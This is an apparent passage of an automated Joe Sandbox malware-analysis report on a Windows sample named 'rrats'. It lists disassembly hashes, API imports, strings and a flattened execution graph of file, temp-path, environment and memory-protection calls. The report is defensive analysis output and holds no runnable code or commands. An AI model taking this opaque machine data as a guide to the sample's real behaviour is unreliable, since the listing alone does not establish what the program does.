                                                              • Instruction ID: 2dc1dce9721d87249f8b4bf66c96193d66b94a5bedc3318fa95f53f4cfce0a9b
                                                              • Opcode Fuzzy Hash: 09c2c1d4ad5c7305809f6b205369e36697ddb82b62986ae29cce4a3e2646dcfa
                                                              • Instruction Fuzzy Hash: 261108726002C4AAEF11DE34AC41BEF3798AB06751F144075BE4AAB1C1D7B4AD55D760
                                                              APIs
                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00CAF33E), ref: 00CAF3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 00CAF389
                                                              • CryptUnprotectMemory failed, xrefs: 00CAF3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 085d4ca24c61d0c93448c9ec79a5d0f2ce9f854179b7c3529a7438f4b031aaeb
                                                              • Instruction ID: b225660c708de47529ba057c39db3f000569399bcb109c329eef401d28b32241
                                                              • Opcode Fuzzy Hash: 085d4ca24c61d0c93448c9ec79a5d0f2ce9f854179b7c3529a7438f4b031aaeb
                                                              • Instruction Fuzzy Hash: 7D112631A0226AABEF15AF71DD45B6E3754FF02768B04812EFC156F2A1DA309E038791
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CAB9B8
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1543624204-3142399695
                                                              • Opcode ID: 9faff98e9ea3e0e6e9f6a24fd5cd25f92240ab0bc22b1ea639fc1c1e3609c905
                                                              • Instruction ID: 1fbf53ea4dd70cb0478871ede05e597c26ddc8b9dec8c1a7ef5c8afbc93e3ac8
                                                              • Opcode Fuzzy Hash: 9faff98e9ea3e0e6e9f6a24fd5cd25f92240ab0bc22b1ea639fc1c1e3609c905
                                                              • Instruction Fuzzy Hash: E701F563504313799A306B75DC42E6BABACEE93774B40841EF558D6083EB30DD40A3B1
                                                              APIs
                                                                • Part of subcall function 00CAE2E8: _swprintf.LIBCMT ref: 00CAE30E
                                                                • Part of subcall function 00CAE2E8: _strlen.LIBCMT ref: 00CAE32F
                                                                • Part of subcall function 00CAE2E8: SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                • Part of subcall function 00CAE2E8: GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                • Part of subcall function 00CAE2E8: GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                              • SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              • Opcode ID: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                              • Instruction ID: ea258e81fdba878a2032b38d35a79bcf717d0e7cfc844d4da8758ec16181c7a5
                                                              • Opcode Fuzzy Hash: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                              • Instruction Fuzzy Hash: 07F0447010638AA6DF151F518C0D7E93B59AF46348F0C4214FD58955B1DB74CB90EA50
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CB1101,?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FEA
                                                              • GetLastError.KERNEL32(?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FF6
                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB0FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 7a64570b1a9e1294a1664f3c4d8c158a7365d22749dbabe9adb3143af6f7e212
                                                              • Instruction ID: 4e2b23dec670c21dd300c55361b6202a102b13f2e39f00fa64d22b79d5a15b0e
                                                              • Opcode Fuzzy Hash: 7a64570b1a9e1294a1664f3c4d8c158a7365d22749dbabe9adb3143af6f7e212
                                                              • Instruction Fuzzy Hash: 73D02E725081613BCA103328AC0AEAF7A04AB22335F680716F639622F2CA244A916292
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00CADA55,?), ref: 00CAE2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CADA55,?), ref: 00CAE2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                              • Instruction ID: 9d910b4600ea231d9fd5219ed2fac13fb95d12faeda55f20478e2bdf5407bf46
                                                              • Opcode Fuzzy Hash: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                              • Instruction Fuzzy Hash: D7C0123124179166E63037646C0DB47AB585B01B15F05046AB645E92D1DAA5D54086E1

                                                              Execution Graph

                                                              Execution Coverage:12.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:35
26 API calls 23514 ea4d4e CloseHandle 23511->23514 23515 ea1017 26 API calls 23513->23515 23514->23507 23516 ea4d5a GetLastError 23514->23516 23515->23518 23516->23507 23517 e9da47 __dosmaperr 20 API calls 23519 ea4d8a 23517->23519 23518->23507 23518->23511 23519->23501 23532 ea0f63 LeaveCriticalSection 23520->23532 23522 ea4c51 23522->23503 23524 ea0ffc 23523->23524 23525 ea0f95 23523->23525 23526 e9da7d __dosmaperr 20 API calls 23524->23526 23525->23524 23529 ea0fbf 23525->23529 23527 ea1001 23526->23527 23528 e9da6a __dosmaperr 20 API calls 23527->23528 23530 ea0fec 23528->23530 23529->23530 23531 ea0fe6 SetStdHandle 23529->23531 23530->23517 23530->23519 23531->23530 23532->23522 23533->23293 23534->23273 20983 e91ec5 20984 e91ece GetTempPathW 20983->20984 21001 e917d1 _wcslen _wcsrchr 20983->21001 20989 e91eee 20984->20989 20986 e839a9 _swprintf 51 API calls 20986->20989 20987 e92448 20989->20986 20990 e91f25 SetDlgItemTextW 20989->20990 21014 e82680 20989->21014 20993 e91f42 _wcschr 20990->20993 20990->21001 20992 e91aa5 SetWindowTextW 20992->21001 20996 e92028 EndDialog 20993->20996 20993->21001 20996->21001 20998 e91893 SetFileAttributesW 21000 e9194d GetFileAttributesW 20998->21000 21011 e918ad _abort _wcslen 20998->21011 21000->21001 21003 e9195f DeleteFileW 21000->21003 21001->20987 21001->20992 21001->20998 21004 e91c6f GetDlgItem SetWindowTextW SendMessageW 21001->21004 21008 e91caf SendMessageW 21001->21008 21013 e87d24 CompareStringW 21001->21013 21017 e90354 21001->21017 21021 e8f86d GetCurrentDirectoryW 21001->21021 21026 e82a2f 21001->21026 21030 e829b8 21001->21030 21033 e904ce 21001->21033 21003->21001 21005 e91970 21003->21005 21004->21001 21006 e839a9 _swprintf 51 API calls 21005->21006 21007 e91990 GetFileAttributesW 21006->21007 21007->21005 21009 e919a5 MoveFileW 21007->21009 21008->21001 21009->21001 21010 e919bd MoveFileExW 21009->21010 21010->21001 21011->21001 21012 e91929 SHFileOperationW 21011->21012 21022 e83470 21011->21022 
21012->21000 21013->21001 21039 e82692 21014->21039 21018 e9035e 21017->21018 21019 e90430 ExpandEnvironmentStringsW 21018->21019 21020 e9044d 21018->21020 21019->21020 21020->21001 21021->21001 21023 e83485 21022->21023 21024 e839a9 _swprintf 51 API calls 21023->21024 21025 e8349c _wcslen _wcschr 21023->21025 21024->21025 21025->21011 21028 e82a3d 21026->21028 21027 e82af9 6 API calls 21027->21028 21028->21027 21029 e82ad0 21028->21029 21029->21001 21031 e829ca 21030->21031 21032 e829c3 FindClose 21030->21032 21031->21001 21032->21031 21034 e904d8 ___std_exception_copy 21033->21034 21035 e8180a 75 API calls 21034->21035 21038 e904f7 _wcslen 21034->21038 21035->21038 21036 e90354 ExpandEnvironmentStringsW 21036->21038 21037 e90599 21037->21001 21038->21036 21038->21037 21040 e93ac0 21039->21040 21041 e8269f GetFileAttributesW 21040->21041 21042 e826b0 21041->21042 21043 e82689 21041->21043 21044 e83553 GetCurrentDirectoryW 21042->21044 21043->20989 21045 e826c4 21044->21045 21045->21043 21046 e826c8 GetFileAttributesW 21045->21046 21046->21043 22355 e9d4d0 22356 e9d4dc __FrameHandler3::FrameUnwindToState 22355->22356 22357 e9d513 _abort 22356->22357 22363 e9f5b1 EnterCriticalSection 22356->22363 22359 e9d4f0 22360 ea1766 __fassign 20 API calls 22359->22360 22361 e9d500 22360->22361 22364 e9d519 22361->22364 22363->22359 22367 e9f601 LeaveCriticalSection 22364->22367 22366 e9d520 22366->22357 22367->22366 22139 e934d3 22140 e937b8 ___delayLoadHelper2@8 17 API calls 22139->22140 22141 e934e0 22140->22141 23614 ea09d1 23615 ea09f7 23614->23615 23618 ea09f3 23614->23618 23615->23618 23619 e9efc0 31 API calls 23615->23619 23616 e9494c _ValidateLocalCookies 5 API calls 23617 ea0a59 23616->23617 23618->23616 23619->23615 23632 e931ab 23633 e931b5 23632->23633 23634 e937b8 ___delayLoadHelper2@8 17 API calls 23633->23634 23634->23633 19166 e940a2 19167 e940ae __FrameHandler3::FrameUnwindToState 19166->19167 19198 e93bcc 19167->19198 19169 e940b5 19170 e94208 19169->19170 
19173 e940df 19169->19173 19296 e94561 IsProcessorFeaturePresent 19170->19296 19172 e9420f 19263 e9c89d 19172->19263 19182 e9411e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19173->19182 19266 e9d43d 19173->19266 19180 e940fe 19188 e9417f 19182->19188 19274 e9c865 19182->19274 19209 e9467c 19188->19209 19199 e93bd5 19198->19199 19303 e9437d IsProcessorFeaturePresent 19199->19303 19203 e93be6 19208 e93bea 19203->19208 19313 e9d2c7 19203->19313 19205 e93c01 19205->19169 19208->19169 19580 e94bd0 19209->19580 19212 e94185 19213 e9d38e 19212->19213 19582 ea04b0 19213->19582 19215 e9418d 19218 e92ef8 19215->19218 19216 e9d397 19216->19215 19586 ea083b 19216->19586 19961 e86b8f 19218->19961 19222 e92f17 20010 e8fe36 19222->20010 19224 e92f20 _abort 19225 e92f33 GetCommandLineW 19224->19225 19226 e92fc0 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 19225->19226 19227 e92f42 19225->19227 20014 e839a9 19226->20014 20055 e91604 19227->20055 19233 e92fba 19235 e92bf6 2 API calls 19233->19235 19234 e92f50 OpenFileMappingW 19237 e92f69 MapViewOfFile 19234->19237 19238 e92fb0 CloseHandle 19234->19238 19235->19226 19240 e92f7a __InternalCxxFrameHandler 19237->19240 19241 e92fa7 UnmapViewOfFile 19237->19241 19238->19226 20060 e92bf6 19240->20060 19241->19238 20894 e9c61a 19263->20894 19269 e9d454 19266->19269 19267 e9494c _ValidateLocalCookies 5 API calls 19268 e940f8 19267->19268 19268->19180 19270 e9d3e1 19268->19270 19269->19267 19272 e9d410 19270->19272 19271 e9494c _ValidateLocalCookies 5 API calls 19273 e9d439 19271->19273 19272->19271 19273->19182 19275 e9c88d _abort 19274->19275 19276 e9d5bf _abort 19274->19276 19275->19188 19277 e9e105 _abort 38 API calls 19276->19277 19279 e9d5d0 19277->19279 19278 e9d6b0 _abort 38 API calls 19280 e9d5fa 19278->19280 19279->19278 19281 e9da7d __dosmaperr 20 API calls 19280->19281 19284 e9d639 19280->19284 19282 e9d62f 19281->19282 19283 e9d95c ___std_exception_copy 26 API calls 19282->19283 19283->19284 
19284->19188 19297 e94577 _abort 19296->19297 19298 e94622 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19297->19298 19299 e9466d _abort 19298->19299 19299->19172 19300 e9c84f 19301 e9c61a _abort 28 API calls 19300->19301 19302 e9421d 19301->19302 19304 e93be1 19303->19304 19305 e971b1 19304->19305 19322 e9831c 19305->19322 19309 e971cd 19309->19203 19310 e971c2 19310->19309 19336 e98358 19310->19336 19312 e971ba 19312->19203 19379 ea09da 19313->19379 19316 e971d0 19317 e971d9 19316->19317 19318 e971e3 19316->19318 19319 e9753f ___vcrt_uninitialize_ptd 6 API calls 19317->19319 19318->19208 19320 e971de 19319->19320 19321 e98358 ___vcrt_uninitialize_locks DeleteCriticalSection 19320->19321 19321->19318 19323 e98325 19322->19323 19325 e9834e 19323->19325 19326 e971b6 19323->19326 19340 e986cb 19323->19340 19327 e98358 ___vcrt_uninitialize_locks DeleteCriticalSection 19325->19327 19326->19312 19328 e9750c 19326->19328 19327->19326 19360 e985dc 19328->19360 19333 e9753c 19333->19310 19335 e97521 19335->19310 19337 e98382 19336->19337 19338 e98363 19336->19338 19337->19312 19339 e9836d DeleteCriticalSection 19338->19339 19339->19337 19339->19339 19345 e98592 19340->19345 19343 e98703 InitializeCriticalSectionAndSpinCount 19344 e986ee 19343->19344 19344->19323 19346 e985ab 19345->19346 19347 e985d4 19345->19347 19346->19347 19352 e984f7 19346->19352 19347->19343 19347->19344 19350 e985c0 GetProcAddress 19350->19347 19351 e985ce 19350->19351 19351->19347 19357 e98503 ___vcrt_InitializeCriticalSectionEx 19352->19357 19353 e98578 19353->19347 19353->19350 19354 e9851a LoadLibraryExW 19355 e98538 GetLastError 19354->19355 19356 e9857f 19354->19356 19355->19357 19356->19353 19358 e98587 FreeLibrary 19356->19358 19357->19353 19357->19354 19359 e9855a LoadLibraryExW 19357->19359 19358->19353 19359->19356 19359->19357 19361 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19360->19361 19362 e985f6 19361->19362 19363 e9860f TlsAlloc 19362->19363 
19364 e97516 19362->19364 19364->19335 19365 e9868d 19364->19365 19366 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19365->19366 19367 e986a7 19366->19367 19368 e986c2 TlsSetValue 19367->19368 19369 e9752f 19367->19369 19368->19369 19369->19333 19370 e9753f 19369->19370 19371 e97549 19370->19371 19372 e9754f 19370->19372 19374 e98617 19371->19374 19372->19335 19375 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19374->19375 19376 e98631 19375->19376 19377 e98649 TlsFree 19376->19377 19378 e9863d 19376->19378 19377->19378 19378->19372 19380 ea09f7 19379->19380 19383 ea09f3 19379->19383 19380->19383 19385 e9efc0 19380->19385 19382 e93bf3 19382->19205 19382->19316 19397 e9494c 19383->19397 19386 e9efcc __FrameHandler3::FrameUnwindToState 19385->19386 19404 e9f5b1 EnterCriticalSection 19386->19404 19388 e9efd3 19405 ea0ea8 19388->19405 19390 e9efe2 19391 e9eff1 19390->19391 19418 e9ee49 GetStartupInfoW 19390->19418 19429 e9f00d 19391->19429 19395 e9f002 _abort 19395->19380 19398 e94955 IsProcessorFeaturePresent 19397->19398 19399 e94954 19397->19399 19401 e94997 19398->19401 19399->19382 19579 e9495a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19401->19579 19403 e94a7a 19403->19382 19404->19388 19406 ea0eb4 __FrameHandler3::FrameUnwindToState 19405->19406 19407 ea0ed8 19406->19407 19408 ea0ec1 19406->19408 19432 e9f5b1 EnterCriticalSection 19407->19432 19440 e9da7d 19408->19440 19411 ea0ee4 19414 ea0f10 19411->19414 19433 ea0df9 19411->19433 19446 ea0f37 19414->19446 19415 ea0ed0 _abort 19415->19390 19419 e9eef8 19418->19419 19420 e9ee66 19418->19420 19424 e9eeff 19419->19424 19420->19419 19421 ea0ea8 27 API calls 19420->19421 19422 e9ee8f 19421->19422 19422->19419 19423 e9eebd GetFileType 19422->19423 19423->19422 19425 e9ef06 19424->19425 19426 e9ef49 GetStdHandle 19425->19426 19427 e9efb1 19425->19427 19428 e9ef5c GetFileType 19425->19428 19426->19425 19427->19391 19428->19425 19578 e9f601 
LeaveCriticalSection 19429->19578 19431 e9f014 19431->19395 19432->19411 19449 e9fab6 19433->19449 19435 ea0e18 19463 e9d758 19435->19463 19436 ea0e0b 19436->19435 19456 e9f88a 19436->19456 19439 ea0e6a 19439->19411 19498 e9e189 GetLastError 19440->19498 19443 e9d95c 19556 e9d8e1 19443->19556 19445 e9d968 19445->19415 19577 e9f601 LeaveCriticalSection 19446->19577 19448 ea0f3e 19448->19415 19454 e9fac3 _abort 19449->19454 19450 e9fb03 19453 e9da7d __dosmaperr 19 API calls 19450->19453 19451 e9faee RtlAllocateHeap 19452 e9fb01 19451->19452 19451->19454 19452->19436 19453->19452 19454->19450 19454->19451 19469 e9c3df 19454->19469 19484 e9f618 19456->19484 19459 e9f8ba 19461 e9494c _ValidateLocalCookies 5 API calls 19459->19461 19460 e9f8cf InitializeCriticalSectionAndSpinCount 19460->19459 19462 e9f8e6 19461->19462 19462->19436 19464 e9d78c __dosmaperr 19463->19464 19465 e9d763 RtlFreeHeap 19463->19465 19464->19439 19465->19464 19466 e9d778 19465->19466 19467 e9da7d __dosmaperr 18 API calls 19466->19467 19468 e9d77e GetLastError 19467->19468 19468->19464 19474 e9c423 19469->19474 19471 e9494c _ValidateLocalCookies 5 API calls 19472 e9c41f 19471->19472 19472->19454 19473 e9c3f5 19473->19471 19475 e9c42f __FrameHandler3::FrameUnwindToState 19474->19475 19480 e9f5b1 EnterCriticalSection 19475->19480 19477 e9c43a 19481 e9c46c 19477->19481 19479 e9c461 _abort 19479->19473 19480->19477 19482 e9f601 _abort LeaveCriticalSection 19481->19482 19483 e9c473 19482->19483 19483->19479 19485 e9f644 19484->19485 19486 e9f648 19484->19486 19485->19486 19488 e9f668 19485->19488 19491 e9f6b4 19485->19491 19486->19459 19486->19460 19488->19486 19489 e9f674 GetProcAddress 19488->19489 19490 e9f684 _abort 19489->19490 19490->19486 19492 e9f6d5 LoadLibraryExW 19491->19492 19493 e9f6ca 19491->19493 19494 e9f70a 19492->19494 19495 e9f6f2 GetLastError 19492->19495 19493->19485 19494->19493 19496 e9f721 FreeLibrary 19494->19496 19495->19494 19497 e9f6fd LoadLibraryExW 19495->19497 19496->19493 
19497->19494 19499 e9e1a8 19498->19499 19500 e9e1a2 19498->19500 19501 e9fab6 _abort 17 API calls 19499->19501 19505 e9e1ff SetLastError 19499->19505 19517 e9f7db 19500->19517 19503 e9e1ba 19501->19503 19504 e9e1c2 19503->19504 19524 e9f831 19503->19524 19508 e9d758 _free 17 API calls 19504->19508 19506 e9da82 19505->19506 19506->19443 19510 e9e1c8 19508->19510 19512 e9e1f6 SetLastError 19510->19512 19511 e9e1de 19531 e9df6c 19511->19531 19512->19506 19515 e9d758 _free 17 API calls 19516 e9e1ef 19515->19516 19516->19505 19516->19512 19518 e9f618 _abort 5 API calls 19517->19518 19519 e9f802 19518->19519 19520 e9f81a TlsGetValue 19519->19520 19523 e9f80e 19519->19523 19520->19523 19521 e9494c _ValidateLocalCookies 5 API calls 19522 e9f82b 19521->19522 19522->19499 19523->19521 19525 e9f618 _abort 5 API calls 19524->19525 19526 e9f858 19525->19526 19527 e9f873 TlsSetValue 19526->19527 19530 e9f867 19526->19530 19527->19530 19528 e9494c _ValidateLocalCookies 5 API calls 19529 e9e1d7 19528->19529 19529->19504 19529->19511 19530->19528 19536 e9df44 19531->19536 19542 e9de84 19536->19542 19538 e9df68 19539 e9def4 19538->19539 19548 e9dd88 19539->19548 19541 e9df18 19541->19515 19543 e9de90 __FrameHandler3::FrameUnwindToState 19542->19543 19544 e9f5b1 _abort EnterCriticalSection 19543->19544 19545 e9de9a 19544->19545 19546 e9dec0 _abort LeaveCriticalSection 19545->19546 19547 e9deb8 _abort 19546->19547 19547->19538 19549 e9dd94 __FrameHandler3::FrameUnwindToState 19548->19549 19550 e9f5b1 _abort EnterCriticalSection 19549->19550 19551 e9dd9e 19550->19551 19552 e9e0ba _abort 20 API calls 19551->19552 19553 e9ddb6 19552->19553 19554 e9ddcc _abort LeaveCriticalSection 19553->19554 19555 e9ddc4 _abort 19554->19555 19555->19541 19557 e9e189 _abort 20 API calls 19556->19557 19558 e9d8f7 19557->19558 19559 e9d956 19558->19559 19560 e9d905 19558->19560 19567 e9d96c IsProcessorFeaturePresent 19559->19567 19564 e9494c _ValidateLocalCookies 5 API calls 19560->19564 19562 e9d95b 19563 
e9d8e1 ___std_exception_copy 26 API calls 19562->19563 19565 e9d968 19563->19565 19566 e9d92c 19564->19566 19565->19445 19566->19445 19568 e9d977 19567->19568 19571 e9d792 19568->19571 19572 e9d7ae _abort 19571->19572 19573 e9d7da IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19572->19573 19576 e9d8ab _abort 19573->19576 19574 e9494c _ValidateLocalCookies 5 API calls 19575 e9d8c9 GetCurrentProcess TerminateProcess 19574->19575 19575->19562 19576->19574 19577->19448 19578->19431 19579->19403 19581 e9468f GetStartupInfoW 19580->19581 19581->19212 19583 ea04c2 19582->19583 19584 ea04b9 19582->19584 19583->19216 19589 ea03a7 19584->19589 19958 ea07e2 19586->19958 19609 e9e105 GetLastError 19589->19609 19591 ea03b4 19629 ea04ce 19591->19629 19593 ea03bc 19638 ea013b 19593->19638 19596 ea03d3 19596->19583 19600 e9d758 _free 20 API calls 19600->19596 19602 ea0411 19603 e9da7d __dosmaperr 20 API calls 19602->19603 19608 ea0416 19603->19608 19604 ea045a 19604->19608 19662 ea0011 19604->19662 19605 ea042e 19605->19604 19606 e9d758 _free 20 API calls 19605->19606 19606->19604 19608->19600 19610 e9e11b 19609->19610 19611 e9e121 19609->19611 19612 e9f7db _abort 11 API calls 19610->19612 19613 e9fab6 _abort 20 API calls 19611->19613 19615 e9e170 SetLastError 19611->19615 19612->19611 19614 e9e133 19613->19614 19616 e9e13b 19614->19616 19617 e9f831 _abort 11 API calls 19614->19617 19615->19591 19619 e9d758 _free 20 API calls 19616->19619 19618 e9e150 19617->19618 19618->19616 19620 e9e157 19618->19620 19621 e9e141 19619->19621 19622 e9df6c _abort 20 API calls 19620->19622 19623 e9e17c SetLastError 19621->19623 19624 e9e162 19622->19624 19665 e9d6b0 19623->19665 19626 e9d758 _free 20 API calls 19624->19626 19628 e9e169 19626->19628 19628->19615 19628->19623 19630 ea04da __FrameHandler3::FrameUnwindToState 19629->19630 19631 e9e105 _abort 38 API calls 19630->19631 19632 ea04e4 19631->19632 19635 ea0568 _abort 19632->19635 19636 e9d6b0 _abort 38 API calls 
19632->19636 19637 e9d758 _free 20 API calls 19632->19637 19733 e9f5b1 EnterCriticalSection 19632->19733 19734 ea055f 19632->19734 19635->19593 19636->19632 19637->19632 19738 e98ece 19638->19738 19641 ea016e 19643 ea0185 19641->19643 19644 ea0173 GetACP 19641->19644 19642 ea015c GetOEMCP 19642->19643 19643->19596 19645 e9da90 19643->19645 19644->19643 19646 e9dace 19645->19646 19650 e9da9e _abort 19645->19650 19647 e9da7d __dosmaperr 20 API calls 19646->19647 19649 e9dacc 19647->19649 19648 e9dab9 RtlAllocateHeap 19648->19649 19648->19650 19649->19608 19652 ea0570 19649->19652 19650->19646 19650->19648 19651 e9c3df _abort 7 API calls 19650->19651 19651->19650 19653 ea013b 40 API calls 19652->19653 19654 ea058f 19653->19654 19656 ea05e0 IsValidCodePage 19654->19656 19659 ea0596 19654->19659 19661 ea0605 _abort 19654->19661 19655 e9494c _ValidateLocalCookies 5 API calls 19657 ea0409 19655->19657 19658 ea05f2 GetCPInfo 19656->19658 19656->19659 19657->19602 19657->19605 19658->19659 19658->19661 19659->19655 19849 ea0213 GetCPInfo 19661->19849 19922 e9ffce 19662->19922 19676 ea0b96 19665->19676 19668 e9d6c0 19670 e9d6ca IsProcessorFeaturePresent 19668->19670 19675 e9d6e8 19668->19675 19672 e9d6d5 19670->19672 19671 e9c84f _abort 28 API calls 19673 e9d6f2 19671->19673 19674 e9d792 _abort 8 API calls 19672->19674 19674->19675 19675->19671 19706 ea0b04 19676->19706 19679 ea0bf1 19680 ea0bfd _abort 19679->19680 19681 ea0c24 _abort 19680->19681 19682 e9e189 _abort 20 API calls 19680->19682 19685 ea0c2a _abort 19680->19685 19683 ea0c76 19681->19683 19681->19685 19705 ea0c59 19681->19705 19682->19681 19684 e9da7d __dosmaperr 20 API calls 19683->19684 19686 ea0c7b 19684->19686 19691 ea0ca2 19685->19691 19720 e9f5b1 EnterCriticalSection 19685->19720 19687 e9d95c ___std_exception_copy 26 API calls 19686->19687 19687->19705 19693 ea0d01 19691->19693 19695 ea0cf9 19691->19695 19702 ea0d2c 19691->19702 19721 e9f601 LeaveCriticalSection 19691->19721 19693->19702 19722 ea0be8 
